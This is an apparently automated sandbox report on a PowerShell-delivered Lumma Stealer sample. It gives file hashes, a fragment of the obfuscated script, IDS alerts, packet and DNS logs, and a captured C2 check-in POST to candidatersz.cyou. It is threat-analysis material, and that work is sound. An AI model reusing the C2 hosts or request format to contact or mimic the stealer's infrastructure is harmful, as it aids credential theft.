Preview:	.I_aB.Q...i......_Q......bi.....cf.......x_c....Kq....e^E..TI.HN..B.W.WSwrg..R..QC_.T..XNG.n.vO...Zl...Gn.tU.N.H......nbBrv.ZQ.ZXUq.D.aJkFf.Wh....U...Vl.dCb.G..u.f.._Z.E..l.ZEJDyE..S.V...w.LOp][B...l.f...ydFF.An.......PVMj..pI.oV.Y.uR.K..R.[ml..i..v.av.q.QD.sI...dyA...Z..C.DB...ITXu.eW..pc...u.XF\DAYsuJ.LvFHV....w.P..OIO^...Zi..E...El...UQt.C....\..W.VCsT.F..mq.l.i]...I.cZFr.._.ctvi..L.Y...g..MK.dG...FdmA...tNN..x..a.u........r..F....nN_h.eLu.a.Rd`v.NP.ElV.Qg.Zos.L.q_.u.d..PV...^...V.C..l..XON.P.kU.UNJ..Ph..etWj..J...o_.k........rB.[.edW.Gof\NcLjk.W.D.]...VK...A.A.T.p.egk...l.[G..Y.IV.vo..e....YVkuPX...v.U....XUXN.sRu...J..ZX..\.ZQ.U...mh]x..Qh_lb.R.U\.vD._cFd....ijX..Q.......D..QR.S....jMP.m.]bn...r......FsQX......n...].eD]...ygD..bgv..gs..bj.yE...F.C......HG..o..s......RiZBAJ............w.J...Ne.^y.fl..uF.....xf.R..g.Q.mQ.X.k...iUJ......SK.F..dp.W.[Cy.j...c...Px.R.O[.x..YxnPV\P.R.XV._Xf.i.Ue......pk..e.u`k.pf.hY.]Du..a....Xu...G.do..YH......^.An[.X..`.biJGGK..mR...t...t..mm.[.M.N.r.p

C:\Users\user\AppData\Roaming\suHHfJJJ.zip

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	Zip archive data, at least v1.0 to extract, compression method=store
Category:	dropped
Size (bytes):	40305948
Entropy (8bit):	7.99753505894311
Encrypted:	true
SSDEEP:	786432:K6gNbvIgQlCdY+rSb074YJ3jJoyzJ0Op0Btz6KjvJQR8afCcHI80:K6gNbvI5QdY+17dV2OqBZ6Uh3a6ck
MD5:	4324432C547B9D272033E7B4483B0BB3
SHA1:	02642E3420C81693BD712FE3244E5E662640D176
SHA-256:	000ABC24D378FEFBBEE9E4466A200F4088E63C941BB7ECBA18AF54D6E23FECFA
SHA-512:	377BAF05B73A7FA58B16651D92AA12ED1BD415966532FFF590A00F09F52ED5E8287AE85C92B1430BEE9B84834ED33CF12AD383ED629DD30019886C4DA6CB23ED
Malicious:	false
Preview:	PK.........2uY................updater/PK.........2uY................updater/manager/PK........Kw.V....E...]'......updater/manager/ks_tyres.ini.ZKs.8......=...c.....T2...N2.l.T2..2 .$.;.~[..........V?..x......[,....K.,b..b.a.g4VOH.8.........7...i.......H..y.B"B..D...~....q.......H..C].2.....D.H..).PH.C...........&..6../.K...K.........sJ.\.}&.M...S...s.\|[..8.-..w.z..1t+.....B...d...-..dO.rM.Y..{(wP..1.}..g.r...!+..WM.........u...s.)2uCfjT.<~.5....vn9..WEK.....R.....+g>a...K...V[...H.l.....^..K.e..A0[p....e~..3..D.U.*.._......8..\|....~;..<s...;.....I.!.qA..TPG..,!..[i^.s.r.......i"!9.p...Vo4.8 5LZ"T}.4....LD%kU...+.....F..D.....kG...$..d...&.EX...F....,F..,%...%...H...G../>E...1d{.\...U..zv.;..q...,.`.a...:.QJ{Tw.....~.\|.g..<9t&...!.'.:...i..K.`..T..@.q..8..u.K@.:@.".y......A...p\|..uE.6,..$.t.K....e."...-.T.......}.~._.Z.8....3I..,W(O.X..x_7...r........G.......-ys.ok[`.YP....f<7....pUv.vi...2.._m...d.2..O}..!q...`]?..z ..'.U...M...G..-L......c...

Static File Info

General

File type:	ASCII text, with very long lines (65265), with CRLF line terminators
Entropy (8bit):	5.998473052577889
TrID:
File name:	gkzHdqfg.ps1
File size:	53'742'703 bytes
MD5:	d71c930452ae704ac29ec1e5e4586fe3
SHA1:	8651de4941bb4660fb3b3ae9442a8f6fcda2d51f
SHA256:	ee27463e66262cb5be6a087222573b30516fa70b911e359e469e7cc03427e38c
SHA512:	e665f1de54c422f8947e59fa8ebf8136c3157c1686e5e153904d97f1d7a904e2d10f611359b2808d0ceb0e40862fdf0d33c1ad4f2f5960b2a60294378e485466
SSDEEP:	49152:DXyMg7Tu4U0/N/sNe3nxbrLU9Y+HiKzc06HSr5nNALrfJ+Wa93QJkHVgTETwWfc/:s
TLSH:	B2C733116E7A3DBA066CC32E70BF5F1E1BB00F85888CF9DA43E465C7425EB419957C2A
File Content Preview:	.. $lxZLZRpo = "Stop".. Set-Location $Env:AppData.. $CTjptNkO = "$Env:AppData\QHUPRmIp".. if (Test-Path $CTjptNkO) {.. if (Test-Path "$Env:AppData\aDDXrqPt.txt") {.. Remove-Item "$Env:AppData\aDDXrqPt.txt".. }..

File Icon


Icon Hash:	3270d6baae77db44

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-11-22T16:35:39.259623+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49736	104.21.56.6	443	TCP
2024-11-22T16:35:39.957725+0100	2049836	ET MALWARE Lumma Stealer Related Activity	1	192.168.2.4	49736	104.21.56.6	443	TCP
2024-11-22T16:35:39.957725+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.4	49736	104.21.56.6	443	TCP
2024-11-22T16:35:41.352202+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49737	104.21.56.6	443	TCP
2024-11-22T16:35:42.068550+0100	2049812	ET MALWARE Lumma Stealer Related Activity M2	1	192.168.2.4	49737	104.21.56.6	443	TCP
2024-11-22T16:35:42.068550+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.4	49737	104.21.56.6	443	TCP
2024-11-22T16:35:43.807140+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49738	104.21.56.6	443	TCP
2024-11-22T16:35:46.588655+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49739	104.21.56.6	443	TCP
2024-11-22T16:35:47.336423+0100	2048094	ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration	1	192.168.2.4	49739	104.21.56.6	443	TCP
2024-11-22T16:35:48.976324+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49740	104.21.56.6	443	TCP
2024-11-22T16:35:51.684785+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49741	104.21.56.6	443	TCP
2024-11-22T16:35:54.265251+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49742	104.21.56.6	443	TCP
2024-11-22T16:35:54.273670+0100	2843864	ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screen.) M2	1	192.168.2.4	49742	104.21.56.6	443	TCP
2024-11-22T16:35:57.212940+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49743	104.21.56.6	443	TCP
2024-11-22T16:35:57.908420+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.4	49743	104.21.56.6	443	TCP
2024-11-22T16:35:59.275497+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49744	172.67.75.40	443	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 22, 2024 16:35:37.984143972 CET	49736	443	192.168.2.4	104.21.56.6
Nov 22, 2024 16:35:37.984177113 CET	443	49736	104.21.56.6	192.168.2.4
Nov 22, 2024 16:35:37.984246969 CET	49736	443	192.168.2.4	104.21.56.6
Nov 22, 2024 16:35:37.988461018 CET	49736	443	192.168.2.4	104.21.56.6
Nov 22, 2024 16:35:37.988472939 CET	443	49736	104.21.56.6	192.168.2.4
Nov 22, 2024 16:35:39.259537935 CET	443	49736	104.21.56.6	192.168.2.4
Nov 22, 2024 16:35:39.259623051 CET	49736	443	192.168.2.4	104.21.56.6
Nov 22, 2024 16:35:39.265156984 CET	49736	443	192.168.2.4	104.21.56.6
Nov 22, 2024 16:35:39.265163898 CET	443	49736	104.21.56.6	192.168.2.4
Nov 22, 2024 16:35:39.265364885 CET	443	49736	104.21.56.6	192.168.2.4
Nov 22, 2024 16:35:39.316147089 CET	49736	443	192.168.2.4	104.21.56.6
Nov 22, 2024 16:35:39.316176891 CET	49736	443	192.168.2.4	104.21.56.6
Nov 22, 2024 16:35:39.316207886 CET	443	49736	104.21.56.6	192.168.2.4
Nov 22, 2024 16:35:39.957669020 CET	443	49736	104.21.56.6	192.168.2.4
Nov 22, 2024 16:35:39.957729101 CET	443	49736	104.21.56.6	192.168.2.4
Nov 22, 2024 16:35:39.957782030 CET	49736	443	192.168.2.4	104.21.56.6
Nov 22, 2024 16:35:39.961652994 CET	49736	443	192.168.2.4	104.21.56.6
Nov 22, 2024 16:35:39.961662054 CET	443	49736	104.21.56.6	192.168.2.4
Nov 22, 2024 16:35:39.961673021 CET	49736	443	192.168.2.4	104.21.56.6
Nov 22, 2024 16:35:39.961678028 CET	443	49736	104.21.56.6	192.168.2.4
Nov 22, 2024 16:35:40.045505047 CET	49737	443	192.168.2.4	104.21.56.6
Nov 22, 2024 16:35:40.045556068 CET	443	49737	104.21.56.6	192.168.2.4
Nov 22, 2024 16:35:40.045644045 CET	49737	443	192.168.2.4	104.21.56.6
Nov 22, 2024 16:35:40.046483994 CET	49737	443	192.168.2.4	104.21.56.6
Nov 22, 2024 16:35:40.046504021 CET	443	49737	104.21.56.6	192.168.2.4
Nov 22, 2024 16:35:41.352116108 CET	443	49737	104.21.56.6	192.168.2.4
Nov 22, 2024 16:35:41.352201939 CET	49737	443	192.168.2.4	104.21.56.6
Nov 22, 2024 16:35:41.353951931 CET	49737	443	192.168.2.4	104.21.56.6
Nov 22, 2024 16:35:41.353964090 CET	443	49737	104.21.56.6	192.168.2.4
Nov 22, 2024 16:35:41.354201078 CET	443	49737	104.21.56.6	192.168.2.4
Nov 22, 2024 16:35:41.358562946 CET	49737	443	192.168.2.4	104.21.56.6
Nov 22, 2024 16:35:41.358589888 CET	49737	443	192.168.2.4	104.21.56.6
Nov 22, 2024 16:35:41.358628988 CET	443	49737	104.21.56.6	192.168.2.4
Nov 22, 2024 16:35:42.068531036 CET	443	49737	104.21.56.6	192.168.2.4
Nov 22, 2024 16:35:42.068562031 CET	443	49737	104.21.56.6	192.168.2.4
Nov 22, 2024 16:35:42.068586111 CET	443	49737	104.21.56.6	192.168.2.4
Nov 22, 2024 16:35:42.068608046 CET	443	49737	104.21.56.6	192.168.2.4
Nov 22, 2024 16:35:42.068619967 CET	49737	443	192.168.2.4	104.21.56.6
Nov 22, 2024 16:35:42.068643093 CET	443	49737	104.21.56.6	192.168.2.4
Nov 22, 2024 16:35:42.068653107 CET	443	49737	104.21.56.6	192.168.2.4
Nov 22, 2024 16:35:42.068665028 CET	49737	443	192.168.2.4	104.21.56.6
Nov 22, 2024 16:35:42.068694115 CET	49737	443	192.168.2.4	104.21.56.6
Nov 22, 2024 16:35:42.068711042 CET	443	49737	104.21.56.6	192.168.2.4
Nov 22, 2024 16:35:42.076575994 CET	443	49737	104.21.56.6	192.168.2.4
Nov 22, 2024 16:35:42.076631069 CET	49737	443	192.168.2.4	104.21.56.6
Nov 22, 2024 16:35:42.076641083 CET	443	49737	104.21.56.6	192.168.2.4
Nov 22, 2024 16:35:42.087939024 CET	443	49737	104.21.56.6	192.168.2.4
Nov 22, 2024 16:35:42.088009119 CET	49737	443	192.168.2.4	104.21.56.6
Nov 22, 2024 16:35:42.088016987 CET	443	49737	104.21.56.6	192.168.2.4
Nov 22, 2024 16:35:42.188116074 CET	443	49737	104.21.56.6	192.168.2.4
Nov 22, 2024 16:35:42.188173056 CET	49737	443	192.168.2.4	104.21.56.6
Nov 22, 2024 16:35:42.188194990 CET	443	49737	104.21.56.6	192.168.2.4
Nov 22, 2024 16:35:42.278594017 CET	443	49737	104.21.56.6	192.168.2.4
Nov 22, 2024 16:35:42.278646946 CET	49737	443	192.168.2.4	104.21.56.6
Nov 22, 2024 16:35:42.278649092 CET	443	49737	104.21.56.6	192.168.2.4
Nov 22, 2024 16:35:42.278698921 CET	49737	443	192.168.2.4	104.21.56.6
Nov 22, 2024 16:35:42.278886080 CET	49737	443	192.168.2.4	104.21.56.6
Nov 22, 2024 16:35:42.278886080 CET	49737	443	192.168.2.4	104.21.56.6
Nov 22, 2024 16:35:42.278901100 CET	443	49737	104.21.56.6	192.168.2.4
Nov 22, 2024 16:35:42.278909922 CET	443	49737	104.21.56.6	192.168.2.4
Nov 22, 2024 16:35:42.540837049 CET	49738	443	192.168.2.4	104.21.56.6
Nov 22, 2024 16:35:42.540862083 CET	443	49738	104.21.56.6	192.168.2.4
Nov 22, 2024 16:35:42.540951967 CET	49738	443	192.168.2.4	104.21.56.6
Nov 22, 2024 16:35:42.541318893 CET	49738	443	192.168.2.4	104.21.56.6
Nov 22, 2024 16:35:42.541330099 CET	443	49738	104.21.56.6	192.168.2.4
Nov 22, 2024 16:35:43.807049036 CET	443	49738	104.21.56.6	192.168.2.4
Nov 22, 2024 16:35:43.807140112 CET	49738	443	192.168.2.4	104.21.56.6
Nov 22, 2024 16:35:43.810794115 CET	49738	443	192.168.2.4	104.21.56.6
Nov 22, 2024 16:35:43.810800076 CET	443	49738	104.21.56.6	192.168.2.4
Nov 22, 2024 16:35:43.810995102 CET	443	49738	104.21.56.6	192.168.2.4
Nov 22, 2024 16:35:43.812753916 CET	49738	443	192.168.2.4	104.21.56.6
Nov 22, 2024 16:35:43.812900066 CET	49738	443	192.168.2.4	104.21.56.6
Nov 22, 2024 16:35:43.812927008 CET	443	49738	104.21.56.6	192.168.2.4
Nov 22, 2024 16:35:43.812984943 CET	49738	443	192.168.2.4	104.21.56.6
Nov 22, 2024 16:35:43.812990904 CET	443	49738	104.21.56.6	192.168.2.4
Nov 22, 2024 16:35:44.702028990 CET	443	49738	104.21.56.6	192.168.2.4
Nov 22, 2024 16:35:44.702104092 CET	443	49738	104.21.56.6	192.168.2.4
Nov 22, 2024 16:35:44.702156067 CET	49738	443	192.168.2.4	104.21.56.6
Nov 22, 2024 16:35:44.712595940 CET	49738	443	192.168.2.4	104.21.56.6
Nov 22, 2024 16:35:44.712609053 CET	443	49738	104.21.56.6	192.168.2.4
Nov 22, 2024 16:35:45.328304052 CET	49739	443	192.168.2.4	104.21.56.6
Nov 22, 2024 16:35:45.328356981 CET	443	49739	104.21.56.6	192.168.2.4
Nov 22, 2024 16:35:45.328428984 CET	49739	443	192.168.2.4	104.21.56.6
Nov 22, 2024 16:35:45.328855038 CET	49739	443	192.168.2.4	104.21.56.6
Nov 22, 2024 16:35:45.328875065 CET	443	49739	104.21.56.6	192.168.2.4
Nov 22, 2024 16:35:46.588588953 CET	443	49739	104.21.56.6	192.168.2.4
Nov 22, 2024 16:35:46.588654995 CET	49739	443	192.168.2.4	104.21.56.6
Nov 22, 2024 16:35:46.599046946 CET	49739	443	192.168.2.4	104.21.56.6
Nov 22, 2024 16:35:46.599075079 CET	443	49739	104.21.56.6	192.168.2.4
Nov 22, 2024 16:35:46.599262953 CET	443	49739	104.21.56.6	192.168.2.4
Nov 22, 2024 16:35:46.601052046 CET	49739	443	192.168.2.4	104.21.56.6
Nov 22, 2024 16:35:46.601291895 CET	49739	443	192.168.2.4	104.21.56.6
Nov 22, 2024 16:35:46.601320028 CET	443	49739	104.21.56.6	192.168.2.4
Nov 22, 2024 16:35:47.336222887 CET	443	49739	104.21.56.6	192.168.2.4
Nov 22, 2024 16:35:47.336292028 CET	443	49739	104.21.56.6	192.168.2.4
Nov 22, 2024 16:35:47.336375952 CET	49739	443	192.168.2.4	104.21.56.6
Nov 22, 2024 16:35:47.336642981 CET	49739	443	192.168.2.4	104.21.56.6
Nov 22, 2024 16:35:47.336663008 CET	443	49739	104.21.56.6	192.168.2.4
Nov 22, 2024 16:35:47.713005066 CET	49740	443	192.168.2.4	104.21.56.6
Nov 22, 2024 16:35:47.713109970 CET	443	49740	104.21.56.6	192.168.2.4
Nov 22, 2024 16:35:47.713257074 CET	49740	443	192.168.2.4	104.21.56.6
Nov 22, 2024 16:35:47.713567019 CET	49740	443	192.168.2.4	104.21.56.6
Nov 22, 2024 16:35:47.713598967 CET	443	49740	104.21.56.6	192.168.2.4
Nov 22, 2024 16:35:48.976228952 CET	443	49740	104.21.56.6	192.168.2.4
Nov 22, 2024 16:35:48.976324081 CET	49740	443	192.168.2.4	104.21.56.6
Nov 22, 2024 16:35:48.990396976 CET	49740	443	192.168.2.4	104.21.56.6
Nov 22, 2024 16:35:48.990436077 CET	443	49740	104.21.56.6	192.168.2.4
Nov 22, 2024 16:35:48.990636110 CET	443	49740	104.21.56.6	192.168.2.4
Nov 22, 2024 16:35:48.991729021 CET	49740	443	192.168.2.4	104.21.56.6
Nov 22, 2024 16:35:48.991893053 CET	49740	443	192.168.2.4	104.21.56.6
Nov 22, 2024 16:35:48.991929054 CET	443	49740	104.21.56.6	192.168.2.4
Nov 22, 2024 16:35:48.992021084 CET	49740	443	192.168.2.4	104.21.56.6
Nov 22, 2024 16:35:48.992038012 CET	443	49740	104.21.56.6	192.168.2.4
Nov 22, 2024 16:35:49.857937098 CET	443	49740	104.21.56.6	192.168.2.4
Nov 22, 2024 16:35:49.858005047 CET	443	49740	104.21.56.6	192.168.2.4
Nov 22, 2024 16:35:49.858129978 CET	49740	443	192.168.2.4	104.21.56.6
Nov 22, 2024 16:35:49.858215094 CET	49740	443	192.168.2.4	104.21.56.6
Nov 22, 2024 16:35:49.858246088 CET	443	49740	104.21.56.6	192.168.2.4
Nov 22, 2024 16:35:50.372355938 CET	49741	443	192.168.2.4	104.21.56.6
Nov 22, 2024 16:35:50.372399092 CET	443	49741	104.21.56.6	192.168.2.4
Nov 22, 2024 16:35:50.372483969 CET	49741	443	192.168.2.4	104.21.56.6
Nov 22, 2024 16:35:50.372766018 CET	49741	443	192.168.2.4	104.21.56.6
Nov 22, 2024 16:35:50.372785091 CET	443	49741	104.21.56.6	192.168.2.4
Nov 22, 2024 16:35:51.684709072 CET	443	49741	104.21.56.6	192.168.2.4
Nov 22, 2024 16:35:51.684784889 CET	49741	443	192.168.2.4	104.21.56.6
Nov 22, 2024 16:35:51.685975075 CET	49741	443	192.168.2.4	104.21.56.6
Nov 22, 2024 16:35:51.685981035 CET	443	49741	104.21.56.6	192.168.2.4
Nov 22, 2024 16:35:51.686181068 CET	443	49741	104.21.56.6	192.168.2.4
Nov 22, 2024 16:35:51.687231064 CET	49741	443	192.168.2.4	104.21.56.6
Nov 22, 2024 16:35:51.687340021 CET	49741	443	192.168.2.4	104.21.56.6
Nov 22, 2024 16:35:51.687345028 CET	443	49741	104.21.56.6	192.168.2.4
Nov 22, 2024 16:35:52.443613052 CET	443	49741	104.21.56.6	192.168.2.4
Nov 22, 2024 16:35:52.443672895 CET	443	49741	104.21.56.6	192.168.2.4
Nov 22, 2024 16:35:52.443730116 CET	49741	443	192.168.2.4	104.21.56.6
Nov 22, 2024 16:35:52.443914890 CET	49741	443	192.168.2.4	104.21.56.6
Nov 22, 2024 16:35:52.443938017 CET	443	49741	104.21.56.6	192.168.2.4
Nov 22, 2024 16:35:53.005547047 CET	49742	443	192.168.2.4	104.21.56.6
Nov 22, 2024 16:35:53.005631924 CET	443	49742	104.21.56.6	192.168.2.4
Nov 22, 2024 16:35:53.005856037 CET	49742	443	192.168.2.4	104.21.56.6
Nov 22, 2024 16:35:53.006032944 CET	49742	443	192.168.2.4	104.21.56.6
Nov 22, 2024 16:35:53.006067038 CET	443	49742	104.21.56.6	192.168.2.4
Nov 22, 2024 16:35:54.265173912 CET	443	49742	104.21.56.6	192.168.2.4
Nov 22, 2024 16:35:54.265250921 CET	49742	443	192.168.2.4	104.21.56.6
Nov 22, 2024 16:35:54.268794060 CET	49742	443	192.168.2.4	104.21.56.6
Nov 22, 2024 16:35:54.268816948 CET	443	49742	104.21.56.6	192.168.2.4
Nov 22, 2024 16:35:54.269026995 CET	443	49742	104.21.56.6	192.168.2.4
Nov 22, 2024 16:35:54.272511959 CET	49742	443	192.168.2.4	104.21.56.6
Nov 22, 2024 16:35:54.272978067 CET	49742	443	192.168.2.4	104.21.56.6
Nov 22, 2024 16:35:54.273017883 CET	443	49742	104.21.56.6	192.168.2.4
Nov 22, 2024 16:35:54.273148060 CET	49742	443	192.168.2.4	104.21.56.6
Nov 22, 2024 16:35:54.273188114 CET	443	49742	104.21.56.6	192.168.2.4
Nov 22, 2024 16:35:54.273399115 CET	49742	443	192.168.2.4	104.21.56.6
Nov 22, 2024 16:35:54.273463011 CET	443	49742	104.21.56.6	192.168.2.4
Nov 22, 2024 16:35:54.273845911 CET	49742	443	192.168.2.4	104.21.56.6
Nov 22, 2024 16:35:54.273894072 CET	443	49742	104.21.56.6	192.168.2.4
Nov 22, 2024 16:35:54.274049997 CET	49742	443	192.168.2.4	104.21.56.6
Nov 22, 2024 16:35:54.274096012 CET	443	49742	104.21.56.6	192.168.2.4
Nov 22, 2024 16:35:55.918088913 CET	443	49742	104.21.56.6	192.168.2.4
Nov 22, 2024 16:35:55.918160915 CET	443	49742	104.21.56.6	192.168.2.4
Nov 22, 2024 16:35:55.918226957 CET	49742	443	192.168.2.4	104.21.56.6
Nov 22, 2024 16:35:55.918380976 CET	49742	443	192.168.2.4	104.21.56.6
Nov 22, 2024 16:35:55.918425083 CET	443	49742	104.21.56.6	192.168.2.4
Nov 22, 2024 16:35:55.952718019 CET	49743	443	192.168.2.4	104.21.56.6
Nov 22, 2024 16:35:55.952763081 CET	443	49743	104.21.56.6	192.168.2.4
Nov 22, 2024 16:35:55.952855110 CET	49743	443	192.168.2.4	104.21.56.6
Nov 22, 2024 16:35:55.953109980 CET	49743	443	192.168.2.4	104.21.56.6
Nov 22, 2024 16:35:55.953129053 CET	443	49743	104.21.56.6	192.168.2.4
Nov 22, 2024 16:35:57.212852955 CET	443	49743	104.21.56.6	192.168.2.4
Nov 22, 2024 16:35:57.212939978 CET	49743	443	192.168.2.4	104.21.56.6
Nov 22, 2024 16:35:57.214198112 CET	49743	443	192.168.2.4	104.21.56.6
Nov 22, 2024 16:35:57.214210987 CET	443	49743	104.21.56.6	192.168.2.4
Nov 22, 2024 16:35:57.214540005 CET	443	49743	104.21.56.6	192.168.2.4
Nov 22, 2024 16:35:57.215748072 CET	49743	443	192.168.2.4	104.21.56.6
Nov 22, 2024 16:35:57.215765953 CET	49743	443	192.168.2.4	104.21.56.6
Nov 22, 2024 16:35:57.215825081 CET	443	49743	104.21.56.6	192.168.2.4
Nov 22, 2024 16:35:57.908401966 CET	443	49743	104.21.56.6	192.168.2.4
Nov 22, 2024 16:35:57.908515930 CET	443	49743	104.21.56.6	192.168.2.4
Nov 22, 2024 16:35:57.908572912 CET	49743	443	192.168.2.4	104.21.56.6
Nov 22, 2024 16:35:57.908668995 CET	49743	443	192.168.2.4	104.21.56.6
Nov 22, 2024 16:35:57.908694983 CET	443	49743	104.21.56.6	192.168.2.4
Nov 22, 2024 16:35:58.050103903 CET	49744	443	192.168.2.4	172.67.75.40
Nov 22, 2024 16:35:58.050157070 CET	443	49744	172.67.75.40	192.168.2.4
Nov 22, 2024 16:35:58.050244093 CET	49744	443	192.168.2.4	172.67.75.40
Nov 22, 2024 16:35:58.051002979 CET	49744	443	192.168.2.4	172.67.75.40
Nov 22, 2024 16:35:58.051023960 CET	443	49744	172.67.75.40	192.168.2.4
Nov 22, 2024 16:35:59.275424957 CET	443	49744	172.67.75.40	192.168.2.4
Nov 22, 2024 16:35:59.275496960 CET	49744	443	192.168.2.4	172.67.75.40
Nov 22, 2024 16:35:59.314687967 CET	49744	443	192.168.2.4	172.67.75.40
Nov 22, 2024 16:35:59.314713955 CET	443	49744	172.67.75.40	192.168.2.4
Nov 22, 2024 16:35:59.315165043 CET	443	49744	172.67.75.40	192.168.2.4
Nov 22, 2024 16:35:59.326088905 CET	49744	443	192.168.2.4	172.67.75.40
Nov 22, 2024 16:35:59.371337891 CET	443	49744	172.67.75.40	192.168.2.4
Nov 22, 2024 16:35:59.710870028 CET	443	49744	172.67.75.40	192.168.2.4
Nov 22, 2024 16:35:59.710980892 CET	443	49744	172.67.75.40	192.168.2.4
Nov 22, 2024 16:35:59.711026907 CET	443	49744	172.67.75.40	192.168.2.4
Nov 22, 2024 16:35:59.711035967 CET	49744	443	192.168.2.4	172.67.75.40
Nov 22, 2024 16:35:59.711062908 CET	443	49744	172.67.75.40	192.168.2.4
Nov 22, 2024 16:35:59.711097956 CET	443	49744	172.67.75.40	192.168.2.4
Nov 22, 2024 16:35:59.711105108 CET	49744	443	192.168.2.4	172.67.75.40
Nov 22, 2024 16:35:59.711116076 CET	443	49744	172.67.75.40	192.168.2.4
Nov 22, 2024 16:35:59.711157084 CET	49744	443	192.168.2.4	172.67.75.40
Nov 22, 2024 16:35:59.711165905 CET	443	49744	172.67.75.40	192.168.2.4
Nov 22, 2024 16:35:59.719140053 CET	443	49744	172.67.75.40	192.168.2.4
Nov 22, 2024 16:35:59.719208956 CET	49744	443	192.168.2.4	172.67.75.40
Nov 22, 2024 16:35:59.719212055 CET	443	49744	172.67.75.40	192.168.2.4
Nov 22, 2024 16:35:59.719325066 CET	49744	443	192.168.2.4	172.67.75.40
Nov 22, 2024 16:35:59.726501942 CET	49744	443	192.168.2.4	172.67.75.40
Nov 22, 2024 16:35:59.726531029 CET	443	49744	172.67.75.40	192.168.2.4
Nov 22, 2024 16:35:59.726547003 CET	49744	443	192.168.2.4	172.67.75.40
Nov 22, 2024 16:35:59.726553917 CET	443	49744	172.67.75.40	192.168.2.4

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 22, 2024 16:35:37.631654024 CET	50977	53	192.168.2.4	1.1.1.1
Nov 22, 2024 16:35:37.972908974 CET	53	50977	1.1.1.1	192.168.2.4
Nov 22, 2024 16:35:57.911005974 CET	63676	53	192.168.2.4	1.1.1.1
Nov 22, 2024 16:35:58.048636913 CET	53	63676	1.1.1.1	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Nov 22, 2024 16:35:37.631654024 CET	192.168.2.4	1.1.1.1	0xeab6	Standard query (0)	candidatersz.cyou	A (IP address)	IN (0x0001)	false
Nov 22, 2024 16:35:57.911005974 CET	192.168.2.4	1.1.1.1	0x7d	Standard query (0)	rentry.co	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	Address	Type	Class	DNS over HTTPS
Nov 22, 2024 16:35:37.972908974 CET	1.1.1.1	192.168.2.4	0xeab6	No error (0)	candidatersz.cyou	104.21.56.6	A (IP address)	IN (0x0001)	false
Nov 22, 2024 16:35:37.972908974 CET	1.1.1.1	192.168.2.4	0xeab6	No error (0)	candidatersz.cyou	172.67.175.32	A (IP address)	IN (0x0001)	false
Nov 22, 2024 16:35:58.048636913 CET	1.1.1.1	192.168.2.4	0x7d	No error (0)	rentry.co	172.67.75.40	A (IP address)	IN (0x0001)	false
Nov 22, 2024 16:35:58.048636913 CET	1.1.1.1	192.168.2.4	0x7d	No error (0)	rentry.co	104.26.2.16	A (IP address)	IN (0x0001)	false
Nov 22, 2024 16:35:58.048636913 CET	1.1.1.1	192.168.2.4	0x7d	No error (0)	rentry.co	104.26.3.16	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

candidatersz.cyou

rentry.co

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49736	104.21.56.6	443	2208	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-22 15:35:39 UTC	264	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: candidatersz.cyou
2024-11-22 15:35:39 UTC	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
2024-11-22 15:35:39 UTC	1013	IN	HTTP/1.1 200 OK Date: Fri, 22 Nov 2024 15:35:39 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=forj4712eed118dplp6npp4lib; expires=Tue, 18-Mar-2025 09:22:18 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=tZhsXnBhUcQgZZ9evUNzcD84eqF0OGjrJPRic83TGM7hX5ayLkLtmFyefZp9%2FV2OlEoYwvsciEG1XegAAXXCvZ0dexbK62iBq3nvduK8hbiUm2Im5hdc4bixXYLg1iWEC%2BJ8jQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8e69fd981ccdc354-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1699&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2844&recv_bytes=908&delivery_rate=1690793&cwnd=178&unsent_bytes=0&cid=1b111475dc86dbfe&ts=711&x=0"
